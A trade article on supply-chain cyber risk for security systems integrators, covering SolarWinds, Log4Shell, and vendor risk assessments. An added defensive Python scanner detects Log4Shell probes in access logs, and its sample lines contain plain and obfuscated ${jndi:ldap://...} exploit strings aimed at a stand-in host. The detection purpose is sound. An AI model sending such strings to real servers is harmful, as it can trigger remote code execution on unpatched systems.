Maintain a Strong Cyber Posture: New requirements for security projects

Published On
Feb 15, 2022

Cyber risk, once a threat landscape that characteristically targeted large enterprise companies, has spread to new points on the supply chain. Third-party vendors and service providers are now increasingly at risk.

Risk migration

Cyber vulnerabilities exist across IT, physical security, operational technology, controls, automation and the internet of things. Organizations with 50 or fewer employees are especially at risk because they may not have dedicated cybersecurity teams and may not even notice an attack. Smaller firms may be unable to recover from a ransomware attack and may suffer the largest losses relative to the size of the business, according to the Hiscox Cyber Readiness Report.

Phishing, business email compromise, ransomware, insecure remote access and stolen credentials, and direct network intrusion are the most prevalent threats. In some ransomware cases, attackers gain access to one employee's mailbox and then use that trusted account to send convincing phishing messages to colleagues, gaining footholds on other systems and moving laterally across the network.

Sophisticated cybercriminals may leverage SMS text messages (“smishing”), voice phishing by phone (“vishing”) and even social media channels to reach employees.

For systems integrators, there's a lot at stake. Physical security is a sensitive business, and you hold privileged access to your customers' environments. You often maintain and record security diagrams and layouts that show device locations, passwords, customer IT system schedules and IP and MAC addresses. You move between customer locations, plugging into their IT infrastructure for installation and troubleshooting. That process is risky, and your laptops often contain private customer information that would be exposed if a device were lost, stolen or compromised.

Expanding threat vectors

This trend of shifting risk drew wide attention with the SolarWinds breach disclosed in December 2020. The Austin, Texas-based firm develops software that companies use to manage their networks, systems and IT infrastructure. In this digital supply chain attack, hackers inserted malicious code into a signed update of the company's Orion network-monitoring software, so that every customer who installed the update was potentially compromised. Roughly 18,000 organizations worldwide, including Microsoft and U.S. government agencies, downloaded the trojanized update; a smaller subset was then singled out for follow-on intrusion.

Third-party and technology supply-chain risk was a recurring theme in 2021. In early December, a critical vulnerability in Log4j, a widely used Java logging library, was disclosed (CVE-2021-44228, commonly called Log4Shell). According to the Cybersecurity and Infrastructure Security Agency, “Log4j is very broadly used in a variety of consumer and enterprise services, websites and applications—as well as in operational technology products—to log security and performance information. An unauthenticated remote actor could exploit this vulnerability to take control of an affected system.”
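As an added illustration of the kind of check an integrator's IT staff could run against their own web-facing systems during an event like this (example code written for this page, not part of the original article or the CISA advisory): the Python below scans web-server access log lines for the `${jndi:...}` lookup string that Log4Shell exploitation attempts carried. It first undoes URL encoding and then collapses the `${lower:...}` and `${::-x}` nesting tricks attackers used to slip past naive string matching, so an obfuscated payload is reported in its plain form. The log lines are constructed samples using documentation IP ranges, not real traffic.

```python
import re
from urllib.parse import unquote

# Innermost Log4j lookup: a ${...} whose body contains no further "${", "{" or "}".
_INNER = re.compile(r"\$\{([^${}]*)\}")

# The lookup string exploitation attempts carried, matched after normalisation.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve_inner(body: str):
    """Resolve one inner lookup of the kinds used to obfuscate payloads.

    ${lower:X} / ${upper:X} case-convert X; ${name:-default} (including the
    empty-name form ${::-X}) yields the default. Anything else is left alone.
    """
    m = re.fullmatch(r"(lower|upper):(.*)", body, re.IGNORECASE)
    if m:
        return m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper()
    m = re.fullmatch(r".*?:-(.*)", body)  # the first ":-" splits name from default
    if m:
        return m.group(1)
    return None


def normalize(text: str) -> str:
    """Undo URL encoding (single and double) and collapse obfuscating lookups."""
    text = unquote(unquote(text))
    for _ in range(50):  # real payloads nest only a few levels; bound the work
        changed = False

        def _sub(m):
            nonlocal changed
            resolved = _resolve_inner(m.group(1))
            if resolved is None:
                return m.group(0)
            changed = True
            return resolved

        text = _INNER.sub(_sub, text)
        if not changed:
            break
    return text


def is_log4shell_probe(line: str) -> bool:
    """True if the line contains a JNDI lookup once obfuscation is undone."""
    return bool(_JNDI.search(normalize(line)))


def find_probes(lines):
    """Return (index, normalized line) for every line carrying a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        norm = normalize(line)
        if _JNDI.search(norm):
            hits.append((i, norm))
    return hits


# Constructed sample access-log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:14:02:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.5:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:14:02:13 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://198.51.100.5:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:14:02:14 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2F198.51.100.5%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '203.0.113.11 - - [10/Dec/2021:14:02:15 +0000] "GET /docs/${sys:os.name} HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for i, norm in find_probes(SAMPLE_LOG):
        print(f"line {i}: {norm}")
```

A hit in the log shows only that someone tried; whether the attempt succeeded depends on whether a vulnerable log4j-core version was deployed behind that endpoint, so the next step is an inventory of Java applications and the library versions they bundle.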

Cyberattacks are no longer isolated incidents affecting a single organization; there is a clear ripple effect from one vendor to the next. If one of your contractors or suppliers is hacked or hit by ransomware, anyone who does business with them, whether by procuring product or by providing physical security services, may be at risk.

Cybersecurity rings in 2022

Cybersecurity is a top concern in the new year, according to the Silver Spring, Md.-based Security Industry Association’s 2022 Security Megatrends Report.

“The attack vector may not always be an access control server or a security camera; it could be your own corporate servers or a piece of network infrastructure you added to build a client’s security network,” according to the report.

As a direct result, projects may now include new requirements, such as a cybersecurity risk assessment that documents the protections and processes you have in place. Enterprise organizations vetting systems integrators realize that a vendor may be a gateway or weak link and therefore warrants additional analysis. These companies may also expect you to conduct risk assessments of the vendors you do business with.

What you need to do

Every company needs cybersecurity processes, provided either by an in-house team or by an outsourced cybersecurity contractor. Without them, you may lose projects to competitors with a stronger cyber posture who can demonstrate it.

Start with an in-house risk assessment to determine where you stand today. Widely accepted frameworks, such as the Cybersecurity Framework from the National Institute of Standards and Technology and the Critical Security Controls from the Center for Internet Security, East Greenbush, N.Y., serve as guides to implementing basic controls.

For systems integrators, it's not a question of whether you need cybersecurity, but of how quickly you can put a program in place. Many organizations that vet contractors now use dedicated teams to assess new and existing vendors and decide whether their services warrant a deeper cybersecurity review. Will you be ready?
